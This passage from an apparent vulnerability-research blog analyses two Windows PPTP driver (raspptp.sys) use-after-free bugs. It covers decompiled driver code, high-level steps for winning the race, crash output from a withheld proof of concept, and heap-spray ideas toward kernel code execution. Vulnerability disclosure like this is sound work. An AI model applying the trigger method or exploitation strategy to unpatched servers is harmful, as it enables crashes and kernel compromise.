    CallEntry = 0i64;
    curAdaperIRQL = KeAcquireSpinLockRaiseToDpc(&AdapterCtx->PptpAdapterSpinLock);
    BaseCallID = (unsigned int)PptpBaseCallId;
    lpAdapterCtx->HandlerIRQL = curAdaperIRQL;
    if ( lpCallId >= BaseCallID && lpCallId < (unsigned int)PptpMaxCallId )
    {
        if ( PptpCallIdMaskSet )
        {
            CallIdMaskApplied = (unsigned int)lpCallId & PptpCallIdMask;
            if ( CallIdMaskApplied < (unsigned int)PptpWanEndpoints )
            {
                CallEntry = lpAdapterCtx->PptpWanEndpointsArray + CallIdMaskApplied;
                if ( CallEntry )
                    {
                        if ( CallEntry->PptpWanEndpointFullCallId != lpCallId )
                            CallEntry = 0i64;
                    }
            }
        }
        else
        {
            CallEntry = lpAdapterCtx->PptpWanEndpointsArray + lpCallId - BaseCallID;
        }
    }
    KeReleaseSpinLock(&lpAdapterCtx->PptpAdapterSpinLock, curAdaperIRQL);
    return CallEntry;
}

This function effectively just retrieves the array slot that the call context structure should be stored in based on the provided call ID. It then returns the structure at that entry provided that it matches the specified ID and is in fact a valid entry.

So, what’s the issue? Both of these access methods look pretty harmless, right? There is one subtle and simple issue in the way these access methods are used. Locking!

Cross Thread Access?

CallGetCall is intended to be able to retrieve any call allocated by any currently connected control connection. Since a control connection doesn’t care about calls owned by other control connections, the control connection state machine should have no use for CallGetCall; or at least, according to the PPTP RFC, it shouldn’t. However, this isn’t the case: there are several control connection methods in raspptp.sys that use CallGetCall instead of referencing the internal control connection linked list!

If CallGetCall lets us access other control connection call context structures and certain parts of the PPTP handling can occur concurrently, then we can theoretically access the same call context structure in two different threads at the same time! This is starting to sound like a recipe for some racy memory corruption conditions.

Lock and Roll

Both the linked list access method and the CallGetCall function reference a PptpAdapterSpinLock variable on a global context structure. This is a globally accessible kernel spin lock that is to be used to prevent concurrent access to things which can be accessed globally. Using this should make any concurrent use of either call context list access method safe, right?

This isn’t the case at all. Looking at the above pseudo code, the lock in CallGetCall is only actually held while we are searching through the list, which is fine for the lookup, but it is not held once the call structure is returned. Unless the caller re-locks the global lock before using the context structure (spoiler alert: it does not), we have a potential window for unsafe concurrent access.
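
To make the window concrete, here is a minimal, hypothetical user-mode sketch of the same anti-pattern (a CRITICAL_SECTION standing in for the kernel spin lock; this is not the raspptp.sys code): the lock only protects the lookup, so the pointer each caller receives can be freed by the other thread before, or while, it is used.

#include <windows.h>
#include <stdlib.h>

/* Hypothetical illustration of the access pattern described above. */
typedef struct Call { int id; } Call;

static Call            *g_calls[64];   /* call-ID indexed array              */
static CRITICAL_SECTION g_lock;        /* assume InitializeCriticalSection() */
                                       /* has already been called            */

Call *get_call(int id)
{
    Call *c = NULL;
    EnterCriticalSection(&g_lock);     /* held only for the lookup           */
    if (id >= 0 && id < 64)
        c = g_calls[id];
    LeaveCriticalSection(&g_lock);     /* dropped before the caller uses c   */
    return c;     /* another thread may free *c before the caller touches it */
}

/* Thread A (control connection teardown) and thread B (OutgoingCallReply
 * with an error code) can both obtain the same pointer and both free it,
 * because neither takes a reference under the lock before using it.         */
void teardown_path(int id)   { Call *c = get_call(id); free(c); }
void call_reply_path(int id) { Call *c = get_call(id); free(c); } /* double free */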

Concurrent access doesn’t necessarily mean we have a vulnerability. To prove that we have a vulnerability, we need two code locations that could cause a further issue when running with access to the object at the same time. For example, any form of free operation performed on the structure in this scenario could be a good source of an exploitable issue.

Getting Memory Corruption

Within the raspptp.sys driver there are many places where the kind of access we’re looking for can occur and cause different kinds of issues. Going over all of them is probably an entire series worth of blog posts that we can’t imagine anyone really wants. The one we ended up using for the Proof of Concept (PoC) involves the following two operations:

  • Closing A Control Connection
    • When a control connection is closed the control connections call linked list is walked and each call context structure is appropriately de-initialised and freed. This operation is performed by a familiar function, CtlpCleanup.
  • Sending an OutgoingCallReply control message with an error code set
    • If an OutgoingCallReply message is sent with an error set, the call structure that it relates to is freed. The CallGetCall function is used for looking up the call context structure in this control message handling, which means we can use it to perform the free while the control connection close routine is running in a separate thread.

These two conditions create a scenario where if both were to happen consecutively, a call context structure is freed twice, causing a Use after Free/Double Free issue!

Race Against the Machine!

To trigger the race we need to take the following high level steps:

  • Create two control connections and initialise them so we can create calls.
  • On the first connection, we create the maximum number of calls the server will allow.
  • We then concurrently close the first connection and start sending OutgoingCallReply messages for the allocated call IDs.
    • This realistically needs to be done in separate threads bound to separate CPU cores to guarantee true concurrency.
  • Then we sit back and wait for the race to be won?

In practice, reliably implementing these steps is a lot more difficult than it would initially seem. The window for reliably triggering the race condition and the amount of time we have to do something useful once the initial free occurs is incredibly small, even in the best case scenario.

However, this does not mean that it cannot be achieved. With a significant amount of effort it is possible to greatly increase the reliability of triggering the vulnerability. There are many different factors that can be played with to build a path towards successful exploitation.

One Lock, Two Lock, Three Lock, Four!

Let’s take a look at the two bits of code we’re hoping to get perfectly aligned and see just how tricky this race condition is actually going to be.

The CtlpCleanup Linked List Iteration

for ( ListIterator = (LIST_ENTRY *)EnumListEntry(
          &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
          &iteratorState,
          &gAdapter->PptpAdapterSpinLock);
      ListIterator;
      ListIterator = (LIST_ENTRY *)EnumListEntry(
          &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
          &iteratorState,
          &lpCtlCtxToCleanup->pPptpAdapterCtx->PptpAdapterSpinLock) )
{
    lpCallCtx = (CtlCall *)&ListIterator[-1];
    if ( ListIterator != (LIST_ENTRY *)16 && lpCallCtx->CallAllocTag == 'CPTP' )
    {
        ...
        CallCleanup(lpCallCtx); // this will eventually free the call structure
    }
}

We can see here that the loop is fairly small. The main part that we are interested in is the call to CallCleanup that is performed on each Call structure in the control context linked list. Now unfortunately this function is not as simple as we would like. The function contains a large number of different paths to execute and could potentially have a variety of ways that make our race condition harder or easier to exploit. The section that is most interesting for us in our PoC is the following pseudo code snippet.

lpIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
lpCallToClean->NdisVcHandle = 0i64;
lpCallToClean->CurIRQL = lpIRQL;
CallDetachFromAdapter(lpCallToClean);
KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
if ( ... )
{
    CtlDisconnectCall(lpCallToClean);
    CallpCancelCallTimers(lpCallToClean);
    DereferenceRefCount(lpCallToClean); // Decrement from Ctl loop
    lpCallToClean->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
}

KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
return DereferenceRefCount(lpCallToClean); // Freeing decrement

Here, a set of detach operations is performed to remove the call structure from the lists it is stored in and appropriately decrease its internal reference count. A side effect of this detach phase is that the call context structure is removed from both the linked list and the global array. This means that if one thread gets too far through processing a call context structure free before the other one retrieves it from the respective list, the race will already be lost. This further adds to the difficulty in getting these two sections of code lined up.

Ultimately, the final call to DereferenceRefCount causes the release of the underlying memory, which in our scenario happens through the call context structure’s internal free function pointer, which points to the CallFree function. Before we go over what CallFree does, let’s look at the other half of the race condition.

OutgoingCallReply Handling

lpCallOutgoingCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, ReasonCallIdMasked);
if ( lpCallOutgoingCallCtx )
{
    CallEventCallOutReply(lpCallOutgoingCallCtx, lpCtlPayloadBuffer);
}

The preceding excerpt of pseudo code is the bit of the OutgoingCallReply handling that we will be using to access the call context structures from a separate thread. Let’s take a look at the logic in this function which will also free the call context object!

lpCallCtx->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallCtx->CtlCallSpinLock_A);
...
KeReleaseSpinLock(&lpCallCtx->CtlCallSpinLock_A, lpCallCtx->CurIRQL);
if ( OutGoingCallReplyStatusCode )
{
    CallSetState(lpCallCtx, 0xBu, v8, 0);
    CallCleanup(lpCallCtx);
}

This small code snippet from CallEventCallOutReply represents the code that is relevant for our PoC. Effectively, if the status field of the OutgoingCallReply message is set, CallCleanup is called, and this again will eventually result in CallFree being hit.

CallFree

The CallFree function releases resources for multiple sub-objects stored in the call context, as well as the call context itself:

void __fastcall CallFree(CtlCall *CallToBeFreed)
{
    CtlCall *lpCallToBeFreed;
    _NET_BUFFER_LIST *v2;
    NDIS_HANDLE v3;
    NDIS_HANDLE v4;
    PNDIS_HANDLE v5;
    PNDIS_HANDLE v6;
    PNDIS_HANDLE v7;

    if ( CallToBeFreed )
    {
        lpCallToBeFreed = CallToBeFreed;
        ...
        v2 = lpCallToBeFreed->CtlNetBufferList_A;
        if ( v2 )
            ChunkLChunkength(v2);
        v3 = lpCallToBeFreed->CtlCallWorkItemHandle_A;
        if ( v3 )
            NdisFreeIoWorkItem(v3);
        v4 = lpCallToBeFreed->CtlCallWorkItemHandle_B;
        if ( v4 )
            NdisFreeIoWorkItem(v4);
        v5 = lpCallToBeFreed->hCtlCallCloseTimeoutTimerObject;
        if ( v5 )
            NdisFreeTimerObject(v5);
        v6 = lpCallToBeFreed->hCtlCallAckTimeoutTimerObject;
        if ( v6 )
            NdisFreeTimerObject(v6);
        v7 = lpCallToBeFreed->hCtlDieTimeoutTimerObject;
        if ( v7 )
            NdisFreeTimerObject(v7);
        ExFreePoolWithTag(lpCallToBeFreed, 0);
    }
}

In CallFree, none of the sub-objects have their pointers NULLed out by raspptp.sys. This means that any one of these objects can cause a double free condition to occur, giving us a few different locations where we can expect an issue when triggering the vulnerability.
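
Reduced to its simplest form, the problem looks like the hypothetical sketch below (not the driver code): a free routine that leaves its sub-object pointers intact will release the same allocations a second time if it is ever reached again with a stale pointer.

#include <stdlib.h>

/* Hypothetical context whose free routine does not NULL the sub-object
 * pointers it releases. */
typedef struct Ctx {
    void *work_item;
    void *timer;
} Ctx;

void ctx_free(Ctx *c)
{
    if (!c)
        return;
    if (c->work_item)
        free(c->work_item);   /* pointer left dangling afterwards */
    if (c->timer)
        free(c->timer);       /* pointer left dangling afterwards */
    free(c);
}

/* If two racing threads each reach ctx_free() with the same stale pointer,
 * the second call walks the same, already-freed sub-objects: a double free. */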

Something you may notice looking at the code snippets for this vulnerability is that there are large portions of overlapping locks. These in effect prevent each thread from entering certain sections of the cleanup and freeing process at the same time, which makes the race condition harder to predict. However, it does not prevent it from being possible.

We have knowingly not included many of the other hazards and caveats for triggering this vulnerability, as there are just too many different factors to go over, and in actuality a lot of them are self-correcting (luckily for us). The main reason we can ignore a lot of these hazards is that none of them truly stop the two threads from entering the vulnerable condition!

Proof of Concept

We will not yet be publishing our PoC for this vulnerability, to allow time for patches to be fully adopted. This unfortunately makes it hard to show the exact process we took to trigger the vulnerability, but we will release the PoC script at a later date! For now, here is a little sneak peek at the output:

[+] Race Condition Trigger Attempt: 1, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 2, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 3, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 4, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 5, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 6, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 7, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 8, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 9, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 10, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 11, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 12, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 13, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 14, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 15, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 16, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 17, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 18, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 19, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 20, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 21, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 22, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 23, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 24, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 25, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 26, With spacing 0 and sled 25
[****] The Server Has Crashed!

A Wild Crash Appeared!

The first step in PoC development is achieving a successful trigger of a vulnerability, and for kernel vulnerabilities this usually means causing a crash! Here it is: a successful trigger of our race condition, causing the target server to show us the iconic Blue Screen of Death (BSOD).

This crash produces the following bugcheck analysis, and it’s pretty conclusive that we’ve caused one of the intended double free scenarios.

*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa8875b31e820, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa8875b31e778, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5327

Key : Analysis.DebugAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 22625

Key : Analysis.Init.CPU.mSec
Value: 46452

Key : Analysis.Init.Elapsed.mSec
Value: 9300845

Key : Analysis.Memory.CommitPeak.Mb
Value: 82

Key : FailFast.Name
Value: CORRUPT_LIST_ENTRY

Key : FailFast.Type
Value: 3

Key : WER.OS.Branch
Value: fe_release

Key : WER.OS.Timestamp
Value: 2021-05-07T15:00:00Z

Key : WER.OS.Version
Value: 10.0.20348.1

BUGCHECK_CODE: 139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa8875b31e820

BUGCHECK_P3: ffffa8875b31e778

BUGCHECK_P4: 0

TRAP_FRAME: ffffa8875b31e820 -- (.trap 0xffffa8875b31e820)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000003
rdx=ffffcf88f1a78338 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8025f8d8ae1 rsp=ffffa8875b31e9b0 rbp=ffffcf88f1ae0602
r8=0000000000000010 r9=000000000000000b r10=fffff8025b0ddcb0
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
NDIS!ndisFreeNblToNPagedPool+0x91:
fffff802`5f8d8ae1 cd29 int 29h
Resetting default scope

EXCEPTION_RECORD: ffffa8875b31e778 -- (.exr 0xffffa8875b31e778)
ExceptionAddress: fffff8025f8d8ae1 (NDIS!ndisFreeNblToNPagedPool+0x0000000000000091)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000003
Subcode: 0x3 FAST_FAIL_CORRUPT_LIST_ENTRY

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE_STR: c0000409

EXCEPTION_PARAMETER1: 0000000000000003

EXCEPTION_STR: 0xc0000409

STACK_TEXT:
ffffa887`5b31dcf8 fffff802`5b354ea2 : ffffa887`5b31de60 fffff802`5b17bb30 ffff9200`174e5180 00000000`00000000 : nt!DbgBreakPointWithStatus
ffffa887`5b31dd00 fffff802`5b3546ed : ffff9200`00000003 ffffa887`5b31de60 fffff802`5b22c910 00000000`00000139 : nt!KiBugCheckDebugBreak+0x12
ffffa887`5b31dd60 fffff802`5b217307 : ffffa887`5b31e4e0 ffff9200`1732a180 ffffcf88`ef584700 fffffff6`00000004 : nt!KeBugCheck2+0xa7d
ffffa887`5b31e4c0 fffff802`5b229d69 : 00000000`00000139 00000000`00000003 ffffa887`5b31e820 ffffa887`5b31e778 : nt!KeBugCheckEx+0x107
ffffa887`5b31e500 fffff802`5b22a1b2 : 00000000`00000000 fffff802`5f5a1285 ffffcf88`edd5c210 fffff802`5b041637 : nt!KiBugCheckDispatch+0x69
ffffa887`5b31e640 fffff802`5b228492 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiFastFailDispatch+0xb2
ffffa887`5b31e820 fffff802`5f8d8ae1 : ffffcf88`ef584c00 ffffcf88`ef584700 00000000`00000000 00000000`00000000 : nt!KiRaiseSecurityCheckFailure+0x312
ffffa887`5b31e9b0 fffff802`5f8d5d3d : ffffcf88`f1a78350 00000000`00000000 ffffcf88`f1ae06b8 01000000`000002d0 : NDIS!ndisFreeNblToNPagedPool+0x91
ffffa887`5b31e9e0 fffff802`62bd2f7d : ffffcf88`f1ae06b8 fffff802`62bda000 ffffcf88`f1a78050 ffffcf88`f202dd70 : NDIS!NdisFreeNetBufferList+0x11d
ffffa887`5b31ea20 fffff802`62bd323f : ffffcf88`f202dd70 ffffcf88`ef57f1a0 ffffcf88`ef1fc7e8 ffffcf88`f1ae0698 : raspptp!CallFree+0x65
ffffa887`5b31ea50 fffff802`62bd348e : ffffcf88`f1a78050 00000000`00040246 ffffa887`5b31eaa0 00000000`00000018 : raspptp!CallpFinalDerefEx+0x7f
ffffa887`5b31ea80 fffff802`62bd2bad : ffffcf88`f1ae06b8 ffffcf88`f1a78050 00000000`0000000b ffffcf88`f1a78050 : raspptp!DereferenceRefCount+0x1a
ffffa887`5b31eab0 fffff802`62be37b2 : ffffcf88`f1ae0660 ffffcf88`f1ae0698 ffffcf88`f1ae06b8 ffffcf88`f1a78050 : raspptp!CallCleanup+0x61d
ffffa887`5b31eb00 fffff802`62bd72bd : ffffcf88`00000000 ffffcf88`f15ce810 00000000`00000080 fffff802`62bd7290 : raspptp!CtlpCleanup+0x112
ffffa887`5b31eb90 fffff802`5b143425 : ffffcf88`ef586040 fffff802`62bd7290 00000000`00000000 00000000`00000000 : raspptp!MainPassiveLevelThread+0x2d
ffffa887`5b31ebf0 fffff802`5b21b2a8 : ffff9200`1732a180 ffffcf88`ef586040 fffff802`5b1433d0 00000000`00000000 : nt!PspSystemThreadStartup+0x55
ffffa887`5b31ec40 00000000`00000000 : ffffa887`5b31f000 ffffa887`5b319000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28

SYMBOL_NAME: raspptp!CallFree+65

MODULE_NAME: raspptp

IMAGE_NAME: raspptp.sys

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 65

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_raspptp!CallFree

OS_VERSION: 10.0.20348.1

BUILDLAB_STR: fe_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {5d4f996e-8239-e9e8-d111-fdac16b209be}

Followup: MachineOwner
---------

It turns out that the double free here triggers a kernel assertion on a linked list. The cause of this is one of those sub-objects on the call context structure we mentioned earlier. Now, while crashes are great for PoCs, they are not great for exploits, so what do we need to do next if we want to look at further exploitation more seriously?

Exploitation – Next Steps

The main way in which this particular double free scenario can be exploited would be to spray objects into the kernel heap so that they are incorrectly freed by our second free, rather than causing the above kernel bugcheck.

The first object that might make a good contender is the call context structure itself. If we were to spray a new call context into the freed memory between the two frees being run then we would have a freed call context structure still connected to a valid and accessible control connection. This new call context structure would be comprised of mostly freed sections of memory that can then be used to cause further memory corruption and potentially achieve kernel RCE against a target server!

Conclusion

Race conditions are a particularly tricky set of vulnerabilities, especially when it comes to getting reliable exploitation. In this scenario we have a remarkably small window of opportunity to do something potentially dangerous. Exploit development, however, is the art of taking advantage of small opportunities. Achieving RCE with this vulnerability might seem unlikely, but it is certainly possible! RCE is also not the only use of this vulnerability: with local access to a target machine, it doubles as an opportunity for Local Privilege Escalation (LPE). All this makes CVE-2022-23270 something that, in the right hands, could be very dangerous.

Timeline

  • Vulnerability Reported To Microsoft – 29 October 2021
  • Vulnerability Acknowledged – 29 October 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 January 2022
  • Patch Release – 10 May 2022

The post CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) appeared first on Nettitude Labs.

CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

10 May 2022 at 09:00

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered by sending crafted input to a vulnerable server. It can be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how socket object life cycles are managed by the raspptp.sys driver. In order to understand the vulnerability, we must first understand some of the basics of how the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The WSK API is usually used through a set of event-driven callback functions. Effectively, once a socket is set up, an application can provide a dispatch table containing a set of function pointers to be called for socket-related events. In order for an application to be able to maintain its own state through these callbacks, a context structure is also provided by the driver to each callback, so that state can be tracked for the connection throughout its life cycle.
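
As a rough sketch of what that registration pattern looks like (hypothetical names and simplified callback bodies; check the WSK documentation for the exact callback signatures and data-ownership rules), a connection socket's event callbacks and per-socket context are wired up along these lines:

#include <ntddk.h>
#include <wsk.h>

/* Simplified sketch of the WSK event-callback pattern described above.
 * The context structure and callback names are hypothetical; only the WSK
 * types come from the documented WSK API. */
typedef struct _CONN_CTX {
    LONG  RefCount;       /* life-cycle tracking, much like raspptp.sys      */
    PVOID ProtocolCtx;    /* e.g. a per-connection protocol context          */
} CONN_CTX, *PCONN_CTX;

static NTSTATUS NTAPI ConnReceiveEvent(PVOID SocketContext, ULONG Flags,
                                       PWSK_DATA_INDICATION DataIndication,
                                       SIZE_T BytesIndicated, SIZE_T *BytesAccepted)
{
    PCONN_CTX ctx = (PCONN_CTX)SocketContext;  /* per-socket state            */
    UNREFERENCED_PARAMETER(Flags);
    UNREFERENCED_PARAMETER(DataIndication);
    UNREFERENCED_PARAMETER(BytesIndicated);
    UNREFERENCED_PARAMETER(BytesAccepted);
    UNREFERENCED_PARAMETER(ctx);
    /* Real code must consume or retain the data indication per WSK rules. */
    return STATUS_SUCCESS;
}

static NTSTATUS NTAPI ConnDisconnectEvent(PVOID SocketContext, ULONG Flags)
{
    UNREFERENCED_PARAMETER(SocketContext);
    UNREFERENCED_PARAMETER(Flags);
    return STATUS_SUCCESS;
}

/* Dispatch table handed to WSK for an accepted connection socket, alongside
 * a pointer to the CONN_CTX instance used as the SocketContext argument.    */
static const WSK_CLIENT_CONNECTION_DISPATCH g_ConnDispatch = {
    ConnReceiveEvent,        /* WskReceiveEvent      */
    ConnDisconnectEvent,     /* WskDisconnectEvent   */
    NULL                     /* WskSendBacklogEvent  */
};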

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections: a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so let’s break down the life cycle of how raspptp.sys handles these connections with WSK.

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys. This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEvent handler. This is the callback that handles a socket accept event, aka a new incoming connection.
  2. When a new client connects to the server the WskConnAcceptEvent function is called.  This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP control connection and creates a context structure specifically for tracking the state of the client’s PPTP control connection. This is the main object which we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle_1,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                lpNDISMiniportHandle_2,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                    (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                    &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                    &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only fields of the socket context structure that we care about are the following:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.
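
Reconstructed as a partial C structure (offsets taken from the disassembly above; the field names are the reverse-engineered ones used in this post and the real structure is larger), that portion of the socket context might look like this:

#include <ntdef.h>

/* Partial reconstruction of the per-socket context, based only on the
 * offsets shown above; everything outside 0x08-0x20 is omitted.           */
typedef struct _SOCKET_CTX_PARTIAL {
    UCHAR Reserved[8];                   /* 0x00: not relevant here          */
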